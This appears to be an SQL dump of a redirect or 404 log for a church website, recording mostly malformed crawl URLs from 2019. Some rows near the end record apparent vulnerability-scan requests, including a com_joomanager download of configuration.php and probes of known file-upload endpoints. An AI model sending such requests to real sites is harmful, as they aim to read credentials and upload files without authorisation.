(10262, 'https://lifeoasisinternationalchurch.org/divine-agenda/about-us/our-founder', NULL, '', '', 1, 0, '2019-02-19 16:03:26', '0000-00-00 00:00:00', 301),
(10263, 'https://lifeoasisinternationalchurch.org/divine-agenda/about-us/ordained', NULL, '', '', 1, 0, '2019-02-19 16:03:27', '0000-00-00 00:00:00', 301),
(10264, 'https://lifeoasisinternationalchurch.org/divine-agenda/about-us/our-belief', NULL, '', '', 1, 0, '2019-02-19 16:03:27', '0000-00-00 00:00:00', 301),
(10265, 'https://lifeoasisinternationalchurch.org/divine-agenda/resources/live-streaming', NULL, '', '', 1, 0, '2019-02-19 16:03:27', '0000-00-00 00:00:00', 301),
(10266, 'https://lifeoasisinternationalchurch.org/divine-agenda/resources/pod', NULL, '', '', 1, 0, '2019-02-19 16:03:28', '0000-00-00 00:00:00', 301),
(10267, 'https://lifeoasisinternationalchurch.org/divine-agenda/resources/blog', NULL, '', '', 1, 0, '2019-02-19 16:03:28', '0000-00-00 00:00:00', 301),
(10268, 'https://lifeoasisinternationalchurch.org/divine-agenda/partnership/level', NULL, '', '', 1, 0, '2019-02-19 16:03:29', '0000-00-00 00:00:00', 301),
(10269, 'https://lifeoasisinternationalchurch.org/divine-agenda/resources/broadcast-schedule', NULL, '', '', 1, 0, '2019-02-19 16:03:29', '0000-00-00 00:00:00', 301),
(10270, 'https://lifeoasisinternationalchurch.org/divine-agenda/resources/downloads', NULL, '', '', 1, 0, '2019-02-19 16:03:29', '0000-00-00 00:00:00', 301),
(10271, 'https://lifeoasisinternationalchurch.org/divine-agenda/contact-us/testimonies', NULL, '', '', 1, 0, '2019-02-19 16:03:30', '0000-00-00 00:00:00', 301),
(10272, 'https://lifeoasisinternationalchurch.org/divine-agenda/contact-us', NULL, '', '', 1, 0, '2019-02-19 16:03:30', '0000-00-00 00:00:00', 301),
(10273, 'https://lifeoasisinternationalchurch.org/divine-agenda/branches', NULL, '', '', 1, 0, '2019-02-19 16:03:32', '0000-00-00 00:00:00', 301),
(10274, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/item/61-from-our-father-s-heart-26-08-2018?tmpl=component&print=1', NULL, '', '', 1, 0, '2019-02-19 16:03:32', '0000-00-00 00:00:00', 301),
(10275, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/itemlist/user/196-lifeoasis', NULL, '', '', 1, 0, '2019-02-19 16:03:32', '0000-00-00 00:00:00', 301),
(10276, 'https://lifeoasisinternationalchurch.org/resources/blog/resources/blog/item/61-from-our-father-s-heart-26-08-2018', NULL, '', '', 1, 0, '2019-02-19 16:18:48', '0000-00-00 00:00:00', 301),
(10277, 'https://lifeoasisinternationalchurch.org/resources/downloads/about-us/ordained', NULL, '', '', 1, 0, '2019-02-19 16:18:52', '0000-00-00 00:00:00', 301),
(10278, 'https://lifeoasisinternationalchurch.org/resources/blog/item/10-sensitivity/resources/blog/itemlist/tag/measures?format=feed&start=0', NULL, '', '', 1, 0, '2019-02-19 16:18:55', '0000-00-00 00:00:00', 301),
(10279, 'https://lifeoasisinternationalchurch.org/resources/blog/youtube', NULL, '', '', 1, 0, '2019-02-19 16:18:55', '0000-00-00 00:00:00', 301),
(10280, 'https://lifeoasisinternationalchurch.org/resources/blog/facebook', NULL, '', '', 1, 0, '2019-02-19 16:18:55', '0000-00-00 00:00:00', 301),
(10281, 'https://lifeoasisinternationalchurch.org/resources/blog/resources/blog/item/42-weighed', NULL, '', '', 1, 0, '2019-02-19 16:18:56', '0000-00-00 00:00:00', 301),
(10282, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/live-streaming', NULL, '', '', 1, 0, '2019-02-19 16:18:56', '0000-00-00 00:00:00', 301),
(10283, 'https://lifeoasisinternationalchurch.org/resources/blog/item/10-sensitivity/resources/blog/itemlist/tag/rapture?format=feed&start=0', NULL, '', '', 1, 0, '2019-02-19 16:18:57', '0000-00-00 00:00:00', 301),
(10284, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/broadcast-schedule', NULL, '', '', 1, 0, '2019-02-19 16:19:00', '0000-00-00 00:00:00', 301),
(10285, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=20:kingdom-leadership-studies-publication-26th-march-2017&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:02', '0000-00-00 00:00:00', 301),
(10286, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=21:kingdom-leadership-studies-publication-2nd-april-2017&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:02', '0000-00-00 00:00:00', 301),
(10287, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=19:kingdom-leadership-studies-publication-19th-march-2017&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:03', '0000-00-00 00:00:00', 301),
(10288, 'https://lifeoasisinternationalchurch.org/resources/blog/periscope', NULL, '', '', 1, 0, '2019-02-19 16:19:03', '0000-00-00 00:00:00', 301),
(10289, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=17:kingdom-leadership-studies-publication-5th-march-2017&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:03', '0000-00-00 00:00:00', 301),
(10290, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=13:kingdom-leadership-studies-publication-19th-february-2017&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:04', '0000-00-00 00:00:00', 301),
(10291, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=9:kingdom-leadership-studies-publication-8th-january-2017&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:07', '0000-00-00 00:00:00', 301),
(10292, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=8:annual-faith-seminar-2017-pamphlet&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:08', '0000-00-00 00:00:00', 301),
(10293, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=3:kingdom-leadership-studies-publication-27th-november-2016&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:09', '0000-00-00 00:00:00', 301),
(10294, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=4:kingdom-leadership-studies-publication-6th-november-2016&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:09', '0000-00-00 00:00:00', 301),
(10295, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=1:kingdom-leadership-studies-publication-30th-october-2016&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:10', '0000-00-00 00:00:00', 301),
(10296, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?start=0', NULL, '', '', 1, 0, '2019-02-19 16:19:10', '0000-00-00 00:00:00', 301),
(10297, 'https://lifeoasisinternationalchurch.org/resources/downloads/about-us/service-times', NULL, '', '', 1, 0, '2019-02-19 16:19:10', '0000-00-00 00:00:00', 301),
(10298, 'https://lifeoasisinternationalchurch.org/resources/downloads/about-us/our-founder', NULL, '', '', 1, 0, '2019-02-19 16:19:10', '0000-00-00 00:00:00', 301),
(10299, 'https://lifeoasisinternationalchurch.org/resources/downloads/about-us/our-belief', NULL, '', '', 1, 0, '2019-02-19 16:19:12', '0000-00-00 00:00:00', 301),
(10300, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=5:passion-for-the-lost', NULL, '', '', 1, 0, '2019-02-19 16:19:14', '0000-00-00 00:00:00', 301),
(10301, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/blog', NULL, '', '', 1, 0, '2019-02-19 16:19:14', '0000-00-00 00:00:00', 301),
(10302, 'https://lifeoasisinternationalchurch.org/resources/downloads/contact-us/testimonies', NULL, '', '', 1, 0, '2019-02-19 16:19:14', '0000-00-00 00:00:00', 301),
(10303, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/pod', NULL, '', '', 1, 0, '2019-02-19 16:19:15', '0000-00-00 00:00:00', 301),
(10304, 'https://lifeoasisinternationalchurch.org/resources/downloads/partnership/level', NULL, '', '', 1, 0, '2019-02-19 16:19:15', '0000-00-00 00:00:00', 301),
(10305, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/spirit-meat', NULL, '', '', 1, 0, '2019-02-19 16:19:15', '0000-00-00 00:00:00', 301),
(10306, 'https://lifeoasisinternationalchurch.org/resources/blog/resources/blog/item/60-from-our-father-s-heart-02-08-2018', NULL, '', '', 1, 0, '2019-02-19 16:19:15', '0000-00-00 00:00:00', 301),
(10307, 'https://lifeoasisinternationalchurch.org/resources/downloads/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:19:16', '0000-00-00 00:00:00', 301),
(10308, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=16:kingdom-leadership-studies-publication-26th-february-2017&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:20', '0000-00-00 00:00:00', 301),
(10309, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=12:kingdom-leadership-studies-publication-29th-november-2016&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:20', '0000-00-00 00:00:00', 301),
(10310, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=11:kingdom-leadership-studies-publication-22nd-january-2017&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:21', '0000-00-00 00:00:00', 301),
(10311, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=7:victory-celebration-service-01-01-2017&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:23', '0000-00-00 00:00:00', 301),
(10312, 'https://lifeoasisinternationalchurch.org/resources/downloads/resources/downloads?download=6:your-new-life&start=20', NULL, '', '', 1, 0, '2019-02-19 16:19:23', '0000-00-00 00:00:00', 301),
(10313, 'https://lifeoasisinternationalchurch.org/resources/blog/item/10-sensitivity/resources/blog/itemlist/tag/spirit?format=feed&start=0', NULL, '', '', 1, 0, '2019-02-19 16:19:24', '0000-00-00 00:00:00', 301),
(10314, 'https://lifeoasisinternationalchurch.org/resources/blog/item/10-sensitivity/resources/blog/itemlist/user/196-lifeoasis?format=feed', NULL, '', '', 1, 0, '2019-02-19 16:19:33', '0000-00-00 00:00:00', 301),
(10315, 'https://lifeoasisinternationalchurch.org/resources/blog/item/10-sensitivity/resources/blog/itemlist/category/1-healing?format=feed', NULL, '', '', 1, 0, '2019-02-19 16:19:36', '0000-00-00 00:00:00', 301),
(10316, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/correct christian/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:19:48', '0000-00-00 00:00:00', 301),
(10317, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/correct christian/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:19:48', '0000-00-00 00:00:00', 301),
(10318, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/itemlist/tag/weights', NULL, '', '', 1, 0, '2019-02-19 16:19:48', '0000-00-00 00:00:00', 301),
(10319, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/item/31-importance-and-significance-of-weights-or-measures', NULL, '', '', 1, 0, '2019-02-19 16:19:49', '0000-00-00 00:00:00', 301),
(10320, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/item/32-the-christian-weights', NULL, '', '', 1, 0, '2019-02-19 16:19:50', '0000-00-00 00:00:00', 301),
(10321, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/itemlist/tag/measures', NULL, '', '', 1, 0, '2019-02-19 16:19:50', '0000-00-00 00:00:00', 301),
(10322, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/item/28-salvation', NULL, '', '', 1, 0, '2019-02-19 16:19:51', '0000-00-00 00:00:00', 301),
(10323, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/item/25-the-position-that-a-christian-must-take-in-these-last-days', NULL, '', '', 1, 0, '2019-02-19 16:19:52', '0000-00-00 00:00:00', 301),
(10324, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/itemlist/tag/salvation', NULL, '', '', 1, 0, '2019-02-19 16:19:52', '0000-00-00 00:00:00', 301),
(10325, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/item/24-correct-christian', NULL, '', '', 1, 0, '2019-02-19 16:19:53', '0000-00-00 00:00:00', 301),
(10326, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/itemlist/tag/last days', NULL, '', '', 1, 0, '2019-02-19 16:19:53', '0000-00-00 00:00:00', 301),
(10327, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/item/19-correct-christian', NULL, '', '', 1, 0, '2019-02-19 16:19:53', '0000-00-00 00:00:00', 301),
(10328, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/itemlist/category/2-faith?format=feed', NULL, '', '', 1, 0, '2019-02-19 16:19:53', '0000-00-00 00:00:00', 301),
(10329, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/item/23-from-our-father-s-heart-12-02-2017', NULL, '', '', 1, 0, '2019-02-19 16:19:53', '0000-00-00 00:00:00', 301),
(10330, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/item/22-correct', NULL, '', '', 1, 0, '2019-02-19 16:19:53', '0000-00-00 00:00:00', 301),
(10331, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/item/17-becoming-an-effective-christian-in-these-last-days', NULL, '', '', 1, 0, '2019-02-19 16:19:53', '0000-00-00 00:00:00', 301),
(10332, 'https://lifeoasisinternationalchurch.org/divine-agenda/divine-agenda/itemlist/category/2-faith?start=14', NULL, '', '', 1, 0, '2019-02-19 16:19:53', '0000-00-00 00:00:00', 301),
(10333, 'https://lifeoasisinternationalchurch.org/resources/blog/itemlist/user/196-lifeoasis/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:34:56', '0000-00-00 00:00:00', 301),
(10334, 'https://lifeoasisinternationalchurch.org/component/k2/item/10-sensitivity/component/k2/itemlist/tag/holy spirit?format=feed&start=0', NULL, '', '', 1, 0, '2019-02-19 16:34:57', '0000-00-00 00:00:00', 301),
(10335, 'https://lifeoasisinternationalchurch.org/component/k2/item/10-sensitivity/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:34:59', '0000-00-00 00:00:00', 301),
(10336, 'https://lifeoasisinternationalchurch.org/resources/blog/itemlist/user/196-lifeoasis/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:00', '0000-00-00 00:00:00', 301),
(10337, 'https://lifeoasisinternationalchurch.org/component/k2/item/10-sensitivity/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:00', '0000-00-00 00:00:00', 301),
(10338, 'https://lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/spirit/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:14', '0000-00-00 00:00:00', 301),
(10339, 'https://lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/spirit/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:14', '0000-00-00 00:00:00', 301),
(10340, 'https://lifeoasisinternationalchurch.org/component/k2/item/8-who-is-genuinely-saved/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:17', '0000-00-00 00:00:00', 301),
(10341, 'https://lifeoasisinternationalchurch.org/component/k2/item/8-who-is-genuinely-saved/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:18', '0000-00-00 00:00:00', 301),
(10342, 'https://lifeoasisinternationalchurch.org/component/k2/item/8-who-is-genuinely-saved/component/k2/itemlist/tag/salvation?format=feed&start=0', NULL, '', '', 1, 0, '2019-02-19 16:35:19', '0000-00-00 00:00:00', 301),
(10343, 'https://lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/rapture/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:30', '0000-00-00 00:00:00', 301),
(10344, 'https://lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/rapture/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:31', '0000-00-00 00:00:00', 301),
(10345, 'https://lifeoasisinternationalchurch.org/component/k2/item/25-the-position-that-a-christian-must-take-in-these-last-days/component/k2/itemlist/tag/last days?format=feed&start=0', NULL, '', '', 1, 0, '2019-02-19 16:35:33', '0000-00-00 00:00:00', 301),
(10346, 'https://lifeoasisinternationalchurch.org/component/k2/item/25-the-position-that-a-christian-must-take-in-these-last-days/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:33', '0000-00-00 00:00:00', 301),
(10347, 'https://lifeoasisinternationalchurch.org/component/k2/item/25-the-position-that-a-christian-must-take-in-these-last-days/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:34', '0000-00-00 00:00:00', 301),
(10348, 'https://lifeoasisinternationalchurch.org/component/k2/item/46-from-our-father-s-heart-7-05-2017/component/k2/itemlist/tag/calling?format=feed&start=0', NULL, '', '', 1, 0, '2019-02-19 16:35:38', '0000-00-00 00:00:00', 301),
(10349, 'https://lifeoasisinternationalchurch.org/component/k2/item/46-from-our-father-s-heart-7-05-2017/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:39', '0000-00-00 00:00:00', 301),
(10350, 'https://lifeoasisinternationalchurch.org/component/k2/item/46-from-our-father-s-heart-7-05-2017/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:39', '0000-00-00 00:00:00', 301),
(10351, 'https://lifeoasisinternationalchurch.org/resources/blog/item/51-god-is-committed-to-financing-and-funding-your-primary-purpose-from-our-father-s-heart-11-06-2017/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:55', '0000-00-00 00:00:00', 301),
(10352, 'https://lifeoasisinternationalchurch.org/resources/blog/item/51-god-is-committed-to-financing-and-funding-your-primary-purpose-from-our-father-s-heart-11-06-2017/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:35:55', '0000-00-00 00:00:00', 301),
(10353, 'https://lifeoasisinternationalchurch.org/component/k2/item/28-salvation/component/k2/itemlist/tag/salvation?format=feed&start=0', NULL, '', '', 1, 0, '2019-02-19 16:35:58', '0000-00-00 00:00:00', 301),
(10354, 'https://lifeoasisinternationalchurch.org/component/k2/item/28-salvation/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:00', '0000-00-00 00:00:00', 301),
(10355, 'https://lifeoasisinternationalchurch.org/component/k2/item/28-salvation/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:01', '0000-00-00 00:00:00', 301),
(10356, 'https://lifeoasisinternationalchurch.org/component/k2/item/13-father-s-hearth-08-01-2016/component/k2/itemlist/tag/holy spirit?format=feed&start=0', NULL, '', '', 1, 0, '2019-02-19 16:36:04', '0000-00-00 00:00:00', 301),
(10357, 'https://lifeoasisinternationalchurch.org/component/k2/item/13-father-s-hearth-08-01-2016/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:04', '0000-00-00 00:00:00', 301),
(10358, 'https://lifeoasisinternationalchurch.org/component/k2/item/13-father-s-hearth-08-01-2016/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:04', '0000-00-00 00:00:00', 301),
(10359, 'https://lifeoasisinternationalchurch.org/component/k2/item/31-importance-and-significance-of-weights-or-measures/component/k2/itemlist/tag/measures?format=feed&start=0', NULL, '', '', 1, 0, '2019-02-19 16:36:08', '0000-00-00 00:00:00', 301),
(10360, 'https://lifeoasisinternationalchurch.org/component/k2/item/31-importance-and-significance-of-weights-or-measures/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:09', '0000-00-00 00:00:00', 301),
(10361, 'https://lifeoasisinternationalchurch.org/component/k2/item/31-importance-and-significance-of-weights-or-measures/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:09', '0000-00-00 00:00:00', 301),
(10362, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/resources/blog/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:28', '0000-00-00 00:00:00', 301),
(10363, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/resources/blog/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:29', '0000-00-00 00:00:00', 301),
(10364, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/salvation/youtube/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:34', '0000-00-00 00:00:00', 301),
(10365, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/salvation/youtube/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:35', '0000-00-00 00:00:00', 301),
(10366, 'https://lifeoasisinternationalchurch.org/resources/blog/item/55-divine-appointment/resources/blog/itemlist/tag/spirit/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:45', '0000-00-00 00:00:00', 301),
(10367, 'https://lifeoasisinternationalchurch.org/resources/blog/item/55-divine-appointment/resources/blog/itemlist/tag/spirit/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:36:45', '0000-00-00 00:00:00', 301),
(10368, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/calling/component/k2/item/45-from-our-father-s-heart-30-04-2017/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:37:06', '0000-00-00 00:00:00', 301),
(10369, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/calling/component/k2/item/45-from-our-father-s-heart-30-04-2017/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:37:06', '0000-00-00 00:00:00', 301),
(10370, 'https://lifeoasisinternationalchurch.org/resources/blog/item/10-sensitivity/resources/blog/itemlist/user/196-lifeoasis?start=10/resources/blog/itemlist/user/196-lifeoasis?tmpl=component&template=lighthouse_j3&link=e44c686fdae656cacc91ae77090e606efc8addfe&format=feed', NULL, '', '', 1, 0, '2019-02-19 16:37:07', '0000-00-00 00:00:00', 301),
(10371, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/last days/component/k2/itemlist/user/196-lifeoasis/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:37:15', '0000-00-00 00:00:00', 301),
(10372, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/last days/component/k2/itemlist/user/196-lifeoasis/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:37:15', '0000-00-00 00:00:00', 301),
(10373, 'https://lifeoasisinternationalchurch.org/resources/blog/item/10-sensitivity/resources/blog/item/14-the-hope-of-christ-s-second-coming/resources/blog/itemlist/tag/rapture?format=feed&start=0', NULL, '', '', 1, 0, '2019-02-19 16:37:17', '0000-00-00 00:00:00', 301),
(10374, 'https://lifeoasisinternationalchurch.org/resources/blog/item/10-sensitivity/resources/blog/item/14-the-hope-of-christ-s-second-coming/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:37:22', '0000-00-00 00:00:00', 301),
(10375, 'https://lifeoasisinternationalchurch.org/resources/blog/item/10-sensitivity/resources/blog/item/14-the-hope-of-christ-s-second-coming/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:37:23', '0000-00-00 00:00:00', 301),
(10376, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/about-us/the-church', NULL, '', '', 1, 0, '2019-02-19 16:37:23', '0000-00-00 00:00:00', 301),
(10377, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/about-us/our-founder', NULL, '', '', 1, 0, '2019-02-19 16:37:23', '0000-00-00 00:00:00', 301),
(10378, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/about-us/service-times', NULL, '', '', 1, 0, '2019-02-19 16:37:23', '0000-00-00 00:00:00', 301),
(10379, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/about-us/ordained', NULL, '', '', 1, 0, '2019-02-19 16:37:24', '0000-00-00 00:00:00', 301),
(10380, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/resources/pod', NULL, '', '', 1, 0, '2019-02-19 16:37:24', '0000-00-00 00:00:00', 301),
(10381, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/about-us/our-belief', NULL, '', '', 1, 0, '2019-02-19 16:37:24', '0000-00-00 00:00:00', 301),
(10382, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/resources/downloads', NULL, '', '', 17, 0, '2019-02-19 16:37:24', '0000-00-00 00:00:00', 301),
(10383, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/contact-us', NULL, '', '', 1, 0, '2019-02-19 16:37:24', '0000-00-00 00:00:00', 301),
(10384, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/partnership/level', NULL, '', '', 1, 0, '2019-02-19 16:37:24', '0000-00-00 00:00:00', 301),
(10385, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/resources/broadcast-schedule', NULL, '', '', 1, 0, '2019-02-19 16:37:25', '0000-00-00 00:00:00', 301),
(10386, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/resources/blog', NULL, '', '', 1, 0, '2019-02-19 16:37:25', '0000-00-00 00:00:00', 301),
(10387, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/resources/live-streaming', NULL, '', '', 1, 0, '2019-02-19 16:37:25', '0000-00-00 00:00:00', 301),
(10388, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/branches', NULL, '', '', 1, 0, '2019-02-19 16:37:25', '0000-00-00 00:00:00', 301),
(10389, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/contact-us/testimonies', NULL, '', '', 1, 0, '2019-02-19 16:37:25', '0000-00-00 00:00:00', 301),
(10390, 'https://lifeoasisinternationalchurch.org/resources/downloads/branches/divine-agenda', NULL, '', '', 1, 0, '2019-02-19 16:37:28', '0000-00-00 00:00:00', 301),
(10391, 'https://lifeoasisinternationalchurch.org/resources/blog/item/10-sensitivity/resources/blog/item/39-from-our-father-s-heart-02-04-2017/resources/blog/itemlist/user/196-lifeoasis?tmpl=component&template=lighthouse_j3&link=0512af05339a501a5bc38a9472c2e83351116f52&format=feed', NULL, '', '', 1, 0, '2019-02-19 16:53:18', '0000-00-00 00:00:00', 301),
(10392, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=', NULL, '', '', 1, 0, '2019-02-20 14:31:55', '0000-00-00 00:00:00', 301),
(10393, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php', NULL, '', '', 1, 0, '2019-02-20 14:32:07', '0000-00-00 00:00:00', 301),
(10394, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_myblog&task=ajaxupload', NULL, '', '', 1, 0, '2019-02-20 14:32:12', '0000-00-00 00:00:00', 301),
(10395, 'https://www.lifeoasisinternationalchurch.org/components/com_jbcatalog/libraries/jsupload/server/php', NULL, '', '', 1, 0, '2019-02-20 14:32:28', '0000-00-00 00:00:00', 301),
(10396, 'https://www.lifeoasisinternationalchurch.org/components/com_sexycontactform/fileupload/', NULL, '', '', 1, 0, '2019-02-20 14:32:32', '0000-00-00 00:00:00', 301),
(10397, 'https://www.lifeoasisinternationalchurch.org/fckeditor/editor/filemanager/connectors/php/upload.php?type=media', NULL, '', '', 1, 0, '2019-02-20 14:32:41', '0000-00-00 00:00:00', 301),
(10398, 'https://lifeoasisinternationalchurch.org/components/com_jbcatalog/libraries/jsupload/server/php', NULL, '', '', 4, 0, '2019-02-23 16:44:33', '0000-00-00 00:00:00', 301),
(10399, 'https://lifeoasisinternationalchurch.org/components/com_sexycontactform/fileupload/', NULL, '', '', 4, 0, '2019-02-23 16:44:36', '0000-00-00 00:00:00', 301),
(10400, 'https://lifeoasisinternationalchurch.org/streaming live one', NULL, '', '', 1, 0, '2019-02-24 11:20:14', '0000-00-00 00:00:00', 301),
(10401, 'https://www.lifeoasisinternationalchurch.org/anwc2019', NULL, '', '', 3, 0, '2019-02-25 11:39:08', '0000-00-00 00:00:00', 301),
(10402, 'https://lifeoasisinternationalchurch.org/streaming‬', NULL, '', '', 1, 0, '2019-02-27 09:56:04', '0000-00-00 00:00:00', 301),
(10403, 'https://lifeoasisinternationalchurch.org/sidekiq/busy', NULL, 'http://lifeoasisinternationalchurch.org/sidekiq/busy', '', 1, 0, '2019-02-28 04:28:56', '0000-00-00 00:00:00', 301),
(10404, 'https://lifeoasisinternationalchurch.org/docker/dockerfile', NULL, 'http://lifeoasisinternationalchurch.org/docker/Dockerfile', '', 1, 0, '2019-03-01 14:44:07', '0000-00-00 00:00:00', 301),
(10405, 'https://lifeoasisinternationalchurch.org/youtube/private', NULL, '', '', 1, 0, '2019-03-01 17:52:56', '0000-00-00 00:00:00', 301),
(10406, 'https://www.lifeoasisinternationalchurch.org/private-streamin', NULL, '', '', 1, 0, '2019-03-01 18:39:26', '0000-00-00 00:00:00', 301),
(10407, 'https://lifeoasisinternationalchurch.org/privaterg/', NULL, '', '', 1, 0, '2019-03-01 23:06:33', '0000-00-00 00:00:00', 301),
(10408, 'https://lifeoasisinternationalchurch.org/components/com_foxcontact/', NULL, '', '', 1, 0, '2019-03-02 07:57:00', '0000-00-00 00:00:00', 301),
